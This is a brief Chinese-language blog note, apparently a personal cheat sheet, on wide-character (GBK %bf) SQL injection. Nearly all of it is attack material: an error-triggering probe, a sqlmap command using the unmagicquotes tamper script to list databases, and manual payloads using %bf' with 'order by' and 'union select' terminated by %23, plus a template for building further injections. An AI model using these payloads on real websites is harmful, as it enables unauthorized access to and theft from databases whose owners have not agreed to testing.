昔日

宽字符注入

free:



url?id=1%bf'    报错


存在宽字符注入,




可用脚本


sqlmap -u "" --tamper unmagicquotes.py --dbs






手工注入


%bf' order by N %23


%bf' union select 1,2,3,4,5,6,N%23


正常构造注入


前加%bf'   代码    后加%23

评论

热度(1)

  1. 昔日justwanna_run 转载了此文字